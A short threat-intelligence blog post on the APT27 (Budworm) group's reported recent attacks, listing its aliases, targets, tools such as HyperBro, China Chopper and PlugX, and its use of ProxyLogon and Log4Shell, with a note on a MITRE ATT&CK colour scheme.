Budworm attacks again (allegedly)
Budworm a.k.a APT27, Bronze Union, Emissary Panda, TG-3390, Red Phoenix, LuckyMouse; seems to have resurfaced again after several attacks against asian (health & industry) and middle eastern (gov) targets. Besides, Symantec reports what it seems to be a target shift, after beign recently linked to attacks on an unnamed U.S. state legislature.
Earlier this month, several U.S. security agencies disclosed information about a breach on a industrial defense organization, attributed to multiple nation-state hacking groups. What links this coordinated attack to our old adversary APT27, is the use of the HyperBro backdoor, which has been a classic part of their technique arsenal since at least 2013 and has underwent a continuous retooling. The use of China Chopper web shell and PlugX RAT is a give-away also.
In fact, the recent attacks TTPs have a recognizable pattern of operational flexibility and adaptability, using the Microsoft Exchange ProxyLogon vulnerability to exploit the target systems, dropping China Chopper and HyperBro. Another attack vector of choice is the exploitation of Log4Shell flaws to compromise servers, and delivering by web shells (China Chopper) the malware team: HyperBro backdoor, PlugX RAT, Cobalt Strike post-exploitation framework -a typical weaponization of a legitimate tool-, and credential dumping software (frequently mimikatz).
MITRE ATT&CK matrix: I’ve used the following colour scheme:
· RED: Techniques cited in this article.
· ORANGE: Techniques related to living-off-the-land binaries or legitimate tools coopted.
You can check the APT27 TTP matrix, in this link.
